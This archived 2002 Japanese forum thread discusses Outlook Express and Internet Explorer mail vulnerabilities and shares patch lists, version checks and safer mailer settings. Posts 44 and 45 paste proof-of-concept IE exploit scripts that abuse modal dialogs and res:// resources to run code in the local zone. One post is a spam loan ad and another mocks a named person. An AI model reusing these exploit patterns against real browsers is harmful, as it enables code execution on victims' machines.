5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法

1 :スレ立て代理人:02/05/14 17:10
・IEの脆弱性とその対策
(最近ではKlez、以前はnimdaやBadtransウイルスの蔓延の一因になった)
・IEコンポーネントを使用してHTMLメールを表示するメーラなどの問題点と対策
(OutlookExpressやBecky!など)
・ウイルスに感染しない、蔓延させないためのよりよいメーラの使用方法

等を建設的に話し合いましょう。
各自のお使いのメーラーの推奨設定、使用方法、アンチウイルスソフトとの
連携方法なども提示していただけると非常にありがたいです。

このスレッドは、「Klez.E、Kleaz系スレッド Part2」からの派生スレです。
http://pc.2ch.net/test/read.cgi/sec/1021137509/

現時点の最新OE/IEバージョン・パッチ情報は>>2-10>>2-50

関連スレッド:
「IE5・5と6・0、ネット閲覧ソフトに欠陥」
http://pc.2ch.net/test/read.cgi/sec/1005605775/

2 :名無しさん@お腹いっぱい。:02/05/14 17:11
<<メールに関連するIEの脆弱性と、対策方法について>>
HTMLメールを表示するために、IEコンポーネントを使用するメーラー
(有名どころではOutlook Expressなど)は、メールを開封、もしくは
プレビュー表示させただけで添付ファイルが実行されてしまうという
脆弱性が存在します。
(この脆弱性を利用して、感染被害を拡大させるウイルスが多数存在し、
現在でも世界中に蔓延しています。)

詳細は以下のMicrosoftのリンクを参照してください。
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メール
の添付ファイルを実行する 《MS01-020》」
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020

【対策が必要なソフト】
プレビューしただけで感染する恐れがあるソフト:
Windows95/98/98SE/ME/NT4/2000で、OutlookExpressを使用している方、
OutlookExpress以外でも、HTMLメール表示にIEコンポーネントを使用する
メーラーを使用している方で
・IE4を使っている人
・IE5.01、IE5.5で、SP2(サービスパック2)を当てていない場合
・IE6を、98,98SE,ME,NT4で最小インストールしたPC

バージョンは、ヘルプ→バージョン情報で確認できます。わからない人は下記を
参照してください。
・IEのバージョン確認方法
http://www2.ocn.ne.jp/~circle/IE_version.htm

3 :名無しさん@お腹いっぱい。:02/05/14 17:12
【現時点で対策方法】
前述の《MS01-020》を含め、現時点までに明らかになっている脆弱性への
対策方法は以下の通りです。

・IE6.0(最小インストール以外)を使用している方
 → 《MS02-009》+《MS02-015》を適用してください。
 (OSがXP、又は2000の方は最小インストールでも上記パッチのみでOK)
・IE6.0(最小インストール)を使用している方
 → フルインストール、又は標準インストール後、《MS02-009》+《MS02-015》を適用してください。
・IE5.5(サービスパックなし、またはSP1)を使用している方
 → 《IE5.5 SP2》+《MS02-009》+《MS02-015》の適用
・IE5.01を使用している方(OSが2000、NT)
 → 《IE5.01 SP2》+《MS02-009》+《MS02-015》の適用

・IE5.01を使用している方(OSがWin98、Me)
 → 《IE5.01 SP2》+《MS02-009》の適用
 ※Win98、Me向けのIE5.01に関するサポートは終了したため、《MS02-015》
 パッチはありません。今後のセキュリティ対策のために、IE5.5、もしくは
 IE6への移行を推奨します。

4 :名無しさん@お腹いっぱい。:02/05/14 17:12
〜 サービスパック 〜
《IE5.5 SP2》http://www.microsoft.com/downloads/release.asp?ReleaseID=32082
《IE5.01 SP2》http://www.microsoft.com/downloads/release.asp?ReleaseID=28910

〜 修正パッチ 〜(ダウンロード先のリストから Japanese Language Version を選択)
《MS02-009》Internet Explorer の不正な VBScript 処理により Web ページがローカル
ファイルを読み取る
http://www.microsoft.com/windows/ie/downloads/critical/q318089/default.asp
《MS02-015》2002 年 3 月 28 日 Internet Explorer 用の累積的な修正プログラム
http://www.microsoft.com/windows/ie/downloads/critical/Q319182/default.asp


【対策後の確認】
・修正パッチを適用した場合は、バージョン画面の「更新バージョン」の行に
《MS02-009》を適用した場合は「q318089」が表示されていればOK.
(※《MS02-015》の適用分は表示されません)

・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
IE5、5.5のSP2適用、又はIE6のフル/標準インストールを行った場合は
5.00.3314.2101 Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6 (Windows XP)
のいずれかならばOK。

5 :名無しさん@お腹いっぱい。:02/05/14 17:19
だから、OEは使うなって言ってるだろうが!

6 :名無しさん@お腹いっぱい。:02/05/14 17:25
MSN チャット コントロールの未チェッ クのバッファによりコードが実行される (Q321661) (MS02-022)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-022.asp
MSN Messengerに深刻なホール,すべてのIEユーザーは対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/

7 :名無しさん@お腹いっぱい。:02/05/14 17:26
>>5
それだと、OEじゃなきゃ問題ないみたいように読めます。
私はBecky!ユーザーですが、Becky!もちゃんと対策しないと駄目
なんですよ。リムアーツのサイトのトップにも書いてあります。
Becky!の設定:
「全般的な設定」「HTMLの表示」の項で、「MSIEコンポーネントを使用」
のチェックをはずしていれば、HTMLのメールが添付として扱われますので、
それをダブルクリックしない限り感染することはありません。

それがダブルクリックする人もいるんですよね…「W32.Klez.E removal tools」
なんて件名で来たりすると。

8 : :02/05/14 17:27
>>4
【 訂正 】

【対策後の確認】
・《MS02-015》を適用した場合は、IEバージョン画面の「更新バージョン」の行に
「q319182」が表示されていればOK.
※《MS02-009》の適用分は表示されません

・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
IE5、5.5のSP2適用、又はIE6のフル/標準インストールを行った場合は
5.00.3314.2101 Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6
のいずれかならばOK。

9 : :02/05/14 17:29
XMLHTTP コントロールにより、ローカルファイルにアクセスすることができる (MS02- 008)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-008.asp

10 : :02/05/14 17:31
マイクロソフト セキュリティ情報一覧(IE関連)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp?sel_id=032&info=all&opttop=30

11 :名無しさん@お腹いっぱい。:02/05/14 17:42
OutlookExpressでメールを自動的にプレビューさせない方法
1.メニューバーの[表示]を押します。
2.[レイアウト]を押します。
3.「プレビューウインドウ」のプレビューウインドウを表示するの
  チェックボックスを外します。
4.[適用]ボタンを押してOKを押します。

これでメールはプレビューされません。
しかしウイルスから感染しなくなったのではないのでご注意ください。

12 :名無しさん@お腹いっぱい。:02/05/14 17:45
>>ALL
オツ。
これでOEへの誤解も大方解けるというものじゃ。
また、初心者への啓蒙にも多いに作用することであろう。万歳!!

13 :名無しさん@お腹いっぱい。:02/05/14 17:50
>>5のように根拠を示さないのは荒らしですので放置おながいします。

14 : :02/05/14 17:53
メールの添付ファイルの取り扱い5つの心得(IPAセキュリティセンター)
http://www.ipa.go.jp/security/antivirus/attach5.html

15 : :02/05/14 17:55
ブラウザのセキュリティを設定をする(IPAセキュリティセンター)
http://www.ipa.go.jp/security/ciadr/browser.html

16 : :02/05/14 17:57
ホームユーザー向け セキュリティ対策 早わかりガイド(マイクロソフト)
http://microsoft.com/japan/enable/products/security/

17 :名無しさん@お腹いっぱい。:02/05/14 19:29
O.Eを使っててもパッチ当てて、AVソフトを入れとけばメール受信時
検出してくれるのでウィルスの侵入は防げる。
(最新パターンファイルを入れるのが遅かったらアウトだが)

そんなに心配しなくてもいいのでは?

18 :cheshire-cat:02/05/14 19:48
>>17
うん、そうなんだけど。
アンチウイルスソフトの定義ファイルが出る前の新種villiだったら嫌だから、MS01-020のダイレクトアクションを防ぎたいだけ、かと。

19 :名無しさん@お腹いっぱい。:02/05/15 02:00
>>17 チミ専用に調合された特製トロイだったらどうしる?

20 :名無しさん@お腹いっぱい。:02/05/15 02:07
>>19
何を言いたいのかさっぱり不明なわけだが。

21 :名無しさん@お腹いっぱい。:02/05/15 02:52
今日、Klez にやられた知人のPC復旧を手伝ったんだけど、
それでも頑なにOEを使い続けようとするんで、
その理由を聞いてみたところ、
とにかく、最大シェアを根拠に、MS純正=ブランドであって、
それ以外の 3rd Party のメーラーを使うのはダサいってことらしい。

もしかして、こんな意識を持ってる初心者も多いのかもと、
ちょっと、盲点というか、意表を衝かれた感じだった。

22 :名無しさん@お腹いっぱい。:02/05/15 10:31
WordはMSのだからいいワープロのはずだ、と信じている初心者と
似たようなもんじゃないかな。頑ななのにはこのテが多いな。
まあ、なんか入っているから、無料だからって感じで使っているケースの方が
多いかとは思うけど。こっちは他のを紹介されると動く可能性も。

23 :名無しさん@お腹いっぱい。:02/05/15 12:05
「特別企画 Microsoftのメールとつきあう2番目に冴えたやり方」
http://www.watch.impress.co.jp/pc/docs/article/980401/41/mail/mail.htm

上のURLはちょうど4年前の「PCうおっち」のコラムです。
「PCうおっち」自体は年に一度の冗談企画なのですが、このコラムの中身は
全然冗談ではなく、当時のMSご謹製メーラーの実情と、問題点をよく書いていたと思います。
多分、このコラムが書かれた辺りですでにインターネットを使っていた
(もはや古株と言われてしまうかもしれない。もちろん私も(w )皆さんの
「MSと、MSご謹製メーラーに対する不信感」は、あの頃までに確立してしまっ
てなかなかぬぐい去れないんだろうなあ、と思っています。
だから今のOE批判者の意見には、一部同意してしまうところもあったり。

そういえば当時会社で使えと強制された、MSご謹製の「Internet Mail & News」
は本当にひでぇ代物で、それを元に作られたOutlookExpressは、それに比べる
と全然まともなメーラーだなあと感じてます。(あとは初期設定の件とMessage-ID
の件をなんとかしてもらえれば)
以上、年寄りの長文デスタ。

24 :名無しさん@お腹いっぱい。:02/05/15 13:28
>>20
俺、敵が多いからMSのパッチの公開までのタイムラグが重要。
普段からセキュリティ情報チェックしないと安心できない。


25 :名無しさん@お腹いっぱい。:02/05/15 19:09
>>1
ながながとテンプレしてOEを啓蒙しているようだが
何もしらない初心者にはパッチ当てろっていっても
それすらなんのことだかわからんだろうよ。


26 :名無しさん@お腹いっぱい。:02/05/15 19:37
>>25
パッチも知らないような初心者がここに来ることはないだろうよ。

27 :名無しさん@お腹いっぱい。:02/05/15 19:52
>>25
PC初心者板だとそうかもね。

28 :名無しさん@お腹いっぱい。:02/05/15 20:08
>>25
ここはNetwork Security板なんですが。
パッチも何も知らないような初心者が迷い込むようなところではありません。


29 :名無しさん@お腹いっぱい。:02/05/16 09:06
誰かに「パッチ当てろゴルァ」っていうときに、まとまったテンプレがあると楽という
程度でよろしいんじゃないですか。意外とまとまった情報はないし。

30 : :02/05/16 11:42
「MS02-023 : 2002年5月15日 Internet Explorer 用の累積的な修正プログラ
ム (Q321232)」に関する要約情報です。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-023ov.asp

概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-015 : 2002 年 3 月 28 日 Internet Explorer 用の
累積的な修正プログラムで修正された問題に加えて、新たに 6 つの問題を
排除します。

対象となる製品
==============
・Internet Explorer 6

・Internet Explorer 5.5 Service Pack 2

・Internet Explorer 5.5 Service Pack 1

・Internet Explorer 5.01 Service Pack 2 (Windows 2000 、
Windows NT4.0 に組み込まれているもののみ)

修正プログラム
==============
・Internet Explorer 6
http://download.microsoft.com/download/IE60/secpac27/6/W98NT42KMeXP/JA/q321232.exe

・Internet Explorer 5.5 SP2 and Internet Tools
http://download.microsoft.com/download/ie55sp2/secpac27/5.5_sp2/W98NT42KMe/JA/q321232.exe

・Internet Explorer 5.5 SP1 and Internet Tools
http://download.microsoft.com/download/ie55sp1/secpac27/5.5_sp1/W98NT42KMe/JA/q321232.exe

・Internet Explorer 5.01 SP2
http://download.microsoft.com/download/ie501sp2/secpac27/5.01_sp2/NT45/JA/q321232.exe

31 : :02/05/16 11:42
詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザー
による以下の攻撃を防ぐことができます。


(高) クロスサイトスクリプティング (CSS) により、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。

(高) ローカルコンピュータ上のファイルを読み取ることができる問題です。
しかし、この問題はファイルの場所を事前に知られていない限り悪用されるこ
とはありません。また、ファイルの削除、変更などが行われることも
ありません。

(高) 本来読み取ることができない、クッキー情報が読み取られる問題です。

(中) ファイルをダウンロード際の処理に問題があったために、スクリプトや
意図しないファイル実行される可能性がある問題です。

(低) Internet Explorer のゾーン判定を回避して、スクリプトが
イントラネットゾーンまたは、信頼されたゾーンで実行される
可能性がある 2 つの問題があります。

対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を利用した悪影響を受ける
ことがあります。 この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした
悪意のあるプログラムから行われることがあります。

・ディスク上の任意のファイルが読み取られます。しかし、削除、変更が
行われることはありません。

・意図しないスクリプトが実行されます。

・アプリケーションが実行されます。 (通常悪意のあるアプリケーション
であり、ハードディスクのフォーマットなどが実行されてしまいます)

日本語による詳細については、ただいま準備中です。

32 : :02/05/16 11:49
【対策後の確認】
・修正パッチを適用した場合は、バージョン画面の「更新バージョン」の行に
《MS02-023》を適用した場合は「q321232」が表示されていればOK

33 :名無しさん@お腹いっぱい。:02/05/16 12:04
>>30
おつです!当ててきます。

34 :名無しさん@お腹いっぱい。:02/05/16 14:36
人柱さまのレポートきぼんぬ

35 :名無しさん@お腹いっぱい。:02/05/16 14:41
>28
残念ながら想像できないことが起きています。
こうして2ちゃんの良い板がまたひとつ死んでいく。

36 :名無しさん@お腹いっぱい。:02/05/16 14:53
>>35 もしかしてセキュ板にDQNが誘導されてきている?

37 :名無しさん@お腹いっぱい。:02/05/16 14:54
>>35
2ちゃんに良い板なんかあるのか?

38 :名無しさん@お腹いっぱい。:02/05/16 15:15
>>37
ワラタ

39 :名無しさん@お腹いっぱい。:02/05/16 15:15
これ見て無いとけ。いい板ぞろいだ。
泣ける2ちゃんねる。
ttp://hiroshu29.tripod.co.jp/

40 :名無しさん@お腹いっぱい。:02/05/16 15:18
q321232は「Win2000 SP2+SR1」で問題無しでした。


41 :名無しさん@お腹いっぱい。:02/05/16 15:49
同じくWin2000 SP2+SR1で今のところ大丈夫

42 :人柱3:02/05/16 16:19
Win ME + IE6にq321232当てたら再起動選択時にブルースクリーンに。
その後確認したら、パッチは無事当たっていた模様。

43 :名無しさん@お腹いっぱい。:02/05/16 19:33
Win2K IE5.5 SP1 +《MS02-009》+《MS02-015》な環境です。
《MS02-023》、無事適用できました。

44 : death渋谷系 :02/05/16 19:41
var site = window.parent.dialogArguments.url;


function printSite()
{
document.write( site);
}
<script>
var sCode = '<'+'script>alert("This is running from: " +
location.href);top.close()</'+'script>';
window.showModalDialog("redirect.asp", {url:sCode})
</script>
<%@Language=Jscript%><%
Response.Redirect("res://shdoclc.dll/policyerror.htm");
%>


45 : :02/05/16 19:53
<script language="jscript">
// HTML to be injected (will run in the "My Computer" zone)
var sHTML="<b>We're in!</b>";

// Object to return from tags("link"), must be a function because they use
// objects(i) instead of objects[i], VB style collection access.
function oExploit(iSec) {
return {
// Satisfy line 201
rel:"stylesheet",

// Satisfy line 204
readyState:"exploit",

// Exploit line 205
href:sHTML
};
}

// A length property so it will enter the loop
oExploit.length=1;

// A fake window object, so no errors will be raised during the process,
// the custom "tags" method will return an empty array for any element
// other than our target (<link>), in which case it will return the oExploit
// object above.
var oSecurity={
document:{
all:{
tags:function (sTag) {
return sTag=="link" ? oExploit : [];
}
}
}
}

// Run exploit, getFile.asp redirects to res://shdoclc.dll/analyze.dlg
// and oSecurity (fake window) is sent as the dialog argument.
showModelessDialog("getFile.asp",oSecurity);
</script>


46 :名無しさん@お腹いっぱい。:02/05/16 21:02
Win98SE IE5.5SP2です。無事当たりました。

47 :q321232情報:02/05/16 22:36
>>40-41 「Win2000 SP2+SR1」で問題無
>>42 Win ME + IE6にq321232あてるとブルースクリーン。パッチはあたる
>>43 Win2K IE5.5 SP1 +《MS02-009》+《MS02-015》問題なし
>>47 Win/ME IE6.0パッチあてた後に電源オフ。その後電源オンでスキャンディスクが走った。急いでたので電源オフが半端だったかも。


48 :40:02/05/17 00:23
Win2000 SP2+SR1(IE6)で問題なしでした。追記します。

49 :名無しさん@お腹いっぱい。:02/05/17 01:43
winMeでIE6すが、q321232問題なしでしたよ

50 :名無しさん@お腹いっぱい。:02/05/17 03:00
私もWinMe IE6でq321232出来ました。ところでVB2002常駐のままで
実行してよかったのかなァ
初心者的疑問かも。

51 :ヒトバシーラ:02/05/17 10:59
Win98 IE5.5SP2でし。q321232問題なし

52 :q:02/05/17 13:18
夜逃げしたい?
金欠?
ブラック?
別れさせたい?/騙された?/不良債権・名義貸し?
トラブル各種は相談してくれ。
(有)エスアールエー/0120-0120-49
info@sra-japan.com


53 :Internet Explorer最新バージョンまとめ:02/05/18 08:37
・以下のバージョンでかつq318089とQ321232がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
 5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
 5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
 6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
 のいずれか。
・q318089がついていなければ
 http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
 の修正パッチを当てる。
・Q321232がついてなければ
 http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp
 の修正パッチを当てる。


54 :訂正:IE最新バージョン:02/05/18 08:40
・以下のバージョンでかつQ321232がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q321232がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-023.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-009.asp
バージョンに表示されません。

55 :再度スマソ:02/05/18 08:45
リンクがうまくコピーできてなかったので再度スマソ

・以下のバージョンでかつQ321232がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
 5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
 5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
 6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
 のいずれか。
・Q321232がついてなければ
 http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp
 の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
 http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
 バージョンに表示されません。

56 :名無しさん@お腹いっぱい。:02/05/18 11:50
MS02-09のq318089はバージョンに表示されなんですよね。
当てたかどうか忘れちゃったんだけど、確認する方法ないですか?
もう一回当てても不具合ないでしょうか?

57 : :02/05/18 12:19
>>56
http://support.microsoft.com/default.aspx?scid=%2Fisapi%2Fgomscom%2Easp%3Ftarget%3D%2Fjapan%2Fsupport%2Fkb%2Farticles%2Fjp318%2F0%2F89%2Easp&LN=JA


58 :名無しさん@お腹いっぱい。:02/05/18 21:49
>>57
そこを見てもよくわからないんですが・・・・

59 :名無しさん@お腹いっぱい。:02/05/18 22:21
>>58
もういっかいあてれ。
問題なし

60 :名無しさん@お腹いっぱい。:02/05/18 23:53
>>59
ありがとう。そうします。

61 :名無しさん@お腹いっぱい。:02/05/20 08:28
age

62 :名無しさん@お腹いっぱい。:02/05/20 09:36
EdMAX使ってるんだけど、とりあえず大丈夫?

63 :名無しさん@お腹いっぱい。:02/05/20 09:44
270 名前:参加するカモさん :02/05/20 07:43
西村って話し方変わったね
なんだか淡々としてクールでかっこよくなったね
でも本当の西村とはちょっと違うような気がするなあ
今は誰に憧れて誰の真似をしてるのかなあ
中学の頃は東京ラブストーリーの「完治」に憧れてたよねえ
放送日の翌日はガンガンに完治に成りきっちゃって、あのもどかしい喋り方を連発してたよねえ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ

それから西村って中学に入って急に背が伸びたよね
でもどうして学生服は取り換えなかったの?
ズボンはくるぶしが丸見えだったし、学生服は腰までしかなかったじゃん
あんな恰好で完治に成りきられても、ちょっとねぇ、、って感じだったよ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ

ついでに言っちゃうけど、西村って給食を飲み込む瞬間、どうしてあんなに目を見開くの?
癖なのかも知れないけど、なんか牛みたいでおかしかったよ
女子の間では給食の時間に「ひろゆきを見てはいけない」という黄金律があったんだよ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ



64 :IE5.01,IE5.5はパッチ適用後も問題あり?:02/05/22 12:36
重要 : MS02-023 セキュリティ情報の公開時点では、ローカル HTML リソースの
クロスサイト スクリプティング (CVE-CAN-2002-0189) の問題による、IE 6 以
外のバージョンに対する脆弱性は確認できませんでした。しかし、この問題の報告
者より他のバージョンについても同様の問題があるとの連絡を受け、弊社でも現在
確認を行っております。他のバージョンに対する詳細が確認でき次第このページに
てご案内いたします。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-023.asp

http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html

65 :名無しさん@お腹いっぱい。:02/05/22 13:27
>>62
Becky!同様、大丈夫とは言い切れない。
Edcomの http://www.edcom.jp/edmax/avirus.html 読むよろし。

66 :名無しさん@お腹いっぱい。:02/05/28 12:31
PostPet(Windows版)に添付ファイルを強制実行する脆弱性
http://headlines.yahoo.co.jp/hl?a=20020525-00000001-vgb-sci

67 : :02/05/28 13:37
IEのパッチで修正される,Outlookの“隠された”セキュリティ・ホール
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20020524/1/
(閲覧にはメンバー登録必要−無料)

68 :名無しさん@お腹いっぱい。:02/05/28 13:49
パッチ適用後も14種類のセキュリティホールが残る?
"Unpatched IE security holes"
http://jscript.dk/unpatched/

69 :62:02/05/29 00:37
>>65
ありがとうございます。設定をちゃんとやっておけばいいんですね。
デフォルトのままなので、とりあえず大丈夫・・かな?

70 :名無しさん@お腹いっぱい。:02/05/31 08:34
2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム
(Q321232) (MS02-023)
この問題に対する日本語版 KB を公開しました。次のリンク先をご覧下さい。
http://www.microsoft.com/JAPAN/support/kb/articles/JP321/2/32.asp

最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-023.asp
登録日 : 2002/5/16 更新日 : 2002/5/30

71 :名無しさん@お腹いっぱい。:02/05/31 22:33
何だかんだいってOEはデザインだけなら一番好き。
OEのセキュリティホールを狙ったウイルス被害はデザインをマトモにしない3rdメーラーの作者のせいにしてやる

72 :名無しさん@お腹いっぱい。:02/06/01 00:42
>>71
変な考え方。

73 :名無しさん@お腹いっぱい。:02/06/07 22:37
IE 5.5/6に深刻なホール,対策はGopherプロトコルを無効にすること

フィンランドのセキュリティ・ベンダー「Oy Online Solutions」は現地時間6月
4 日,Internet Explorer(IE)5.5/6 のセキュリティ・ホールを公表した。Web
ページや HTMLメール中のリンクをクリックすると,ユーザーのパソコン上で任意
のコード(プロ グラム)を実行させられる恐れがある。対策は,IEの設定を変更
してGopherプロトコ ルを無効にすること。パッチは公開されていない。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020607/1/

74 :名無しさん@お腹いっぱい。:02/06/07 23:40
>>73
ひとまず対処しますた。ありがd

75 :名無しさん@お腹いっぱい。:02/06/08 00:19
>>73
このスレッドは一応タイトルがメーラー関係だから↓の方がよかったかな
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/


76 :名無しさん@お腹いっぱい。:02/06/08 22:14


77 : :02/06/12 10:59
>>73 MSが公表。http://pc.2ch.net/test/read.cgi/sec/1005605775/703とマルチスマソ
MS02-027 に関する情報
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.asp

78 :MS02-030:02/06/28 09:01
OEとは関係ないがIEに関係するので…
「MS02-032: 2002 年 6 月 26 日 Windows Media Player 用の累積的な
修正プログラム (Q320920)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032ov.asp
クライアント―危険度高
特殊なメディア・ファイルを再生することで、 Internet Explorer のキャッシュ
を保存しているディレクトリ (フォルダ) のパスが公開される可能性のある問題です。

79 :名無しさん@お腹いっぱい。:02/06/28 13:56
>>78
Windows Updateで更新可能ですた。

80 :名無しさん@お腹いっぱい。:02/06/28 17:25
ひろみちゅがBecky!のセキュリティホール晒しちゃってるけど、
「OE使うやつ糞、Becky!使え」つってたヤシはどういうんだろう。 (w

OEよかはるかにヘボな穴だよなぁ。他の(国産)メーラも同様の穴があるぽ。

81 :名無しさん@お腹いっぱい。:02/06/28 18:01
一般論だけど、ちょっとした見落としとかあとから見ると
「ヘボな穴」てのは案外あるみたい。
IEやOEの場合、ユーザーが多いからねらわれるもので、
ちょっとした穴でも表沙汰になるてのはありそうだけどね。

82 :cheshire-cat:02/06/28 18:25
Outlook2002でhtmlメルを全てテキストにしちゃえば、割とセキュアな予感。

そうは言っても、いつも南の島とか子犬の画像を貼り付けたhtmlを送る漏れは、困った人なんだろうか。

83 :名無しさん@お腹いっぱい。:02/06/29 01:41
WebBUG貼り付けて開封確認してる俺よりは健全かと…

84 :名無しさん@お腹いっぱい。:02/06/29 02:36
一般的にOE特有のセキュリティホールをついたものはOE以外は関係なかったりするけど、
IEに対するセキュリティホールをついたものはOEでなくても
IEコンポーネントをHTMLメール表示の手段に用いているメーラは感染する危険がある。

…ということはNetscape MessengerかShurikenを使えってこと!?

85 :名無しさん@お腹いっぱい。:02/06/29 10:53
>>80 Becky!の古いバージョンに添付ファイルが強制起動されるセキュリティホール
http://memo.st.ryukoku.ac.jp/archive/200206.month/4294.html

Beckyの公式ページ http://www.rimarts.co.jp/becky-j.htm

86 :80:02/06/29 11:08
>>84
今回のはIEコンポーネントを使ってるせいじゃなく一時ファイルのハンドリングの問題、
OEではとっくに対処済みにもかかわらず、指摘されるまで放置されていた。

前に書いた事あるような気がするけど、OE以外の(特に国産の)メーラは検証されてないから
セキュリティホールが見っかって無いだけだって事が実証されたね。

! ! ! O E 使 え ! ! ! (w

87 :名無しさん@お腹いっぱい。:02/06/29 11:14
デフォでhtml読むのとプレビュonなのが
初心者には最凶の欠陥だと思うのだが・・・

88 :名無しさん@お腹いっぱい。:02/06/29 11:20
漏れも、常用ブラウザはOperaなのに、気に入ったメーラーが見つからなくて
結局OE6.0使ってる。もちろんたまにしか使わないIEのパッチはせっせと
当てているが。
OEもデフォルト設定見直すだけで随分とマシになると思う。

89 :aaa ◆uFEuqEnA :02/06/29 17:44
TC-08@971.5Rlae「A WinXP patch」
postmaster@mail.goo.ne.jp 「Undeliverable mail--\\\"Φ楫\\\"」
inet@microsoft.com 「Scrolling」
canon@cat.email.ne.jp「溺豕楫」

ウイルスメールを添付してくるメルアド。


90 :名無しさん@お腹いっぱい。:02/06/29 19:58
( ゚Д゚)ハァ?

91 :名無しさん@お腹いっぱい。:02/06/29 22:09
>>86
何もわかってない人以外は、「HTMLメールを表示」なんて
とっくにオフにしてしまってると思いますが。
その辺はどうなんだろうか?>Becky!使いの方々。

92 :名無しさん@お腹いっぱい。:02/06/30 12:57
その「何も分かってない人」のせいでこれだけウィルスが広まってると思うんだが。
ウチの職場なんてhtml、プレビュOffの奴ほとんどおらんかったぞ。
どこの職場でも似たような惨状だろう。だからパソコン買って始めて使う
メーラがOEって現状がやばすぎるんでないかと。

93 :名無しさん@お腹いっぱい。:02/07/10 19:38
>>91>>92
あの、すんません。
俺、「HTMLメールを表示」なんて項目をオフにした覚えが無くて慌ててオプション探したんですが見つからず、
調べてみても
デフォの送信をテキスト形式にする
プレビューoff
次の時間プレビューするとメッセージを開封済みにする
プレビューウィンドウで表示するメッセージを自動的にダウンロードする
のチェックをはずすくらいしか解説してなかったり…

どこっすか? 今までに一通もHTMLメール来た事無いけど、設定しとかないと不安です…

94 :名無しさん@お腹いっぱい。:02/07/10 21:41
>>93
>「HTMLメールを表示」なんて項目
91、92じゃ無いけど横から失礼。そいいう項目は「無い」。
あくまで「送信時の形式をhtmlかtextか」選択するだけ。html形式で送信
されるメールによって伝播するウィルスが有るのは確かだから、自分が
加害者になるのを防げるだけ。

で、以下は極論(識者の反論歓迎)
htmlメール見るなっていうのは「交通事故おこしたく無いなら車運転するな」
っていうのと同じでナンセンス、というのが俺の考え。html形式のメールは
text形式のメールでは表現できない良さが有るし、それ自体が悪ではない。
http://japan.internet.com/wmnews/20020624/1.html
こういう話も有る。
不安になるくらいだからAVソフトの導入くらいはやってるんだろう?
そうなら、恐れるな。
・添付ファイルを安易に実行しない。
・プレビューをオフ(これもフィルタールールを設定してうまく振り分ければ
を俺は必要無いと思うが)
で充分だよ。


95 :名無しさん@お腹いっぱい。:02/07/12 17:05
>>93-94
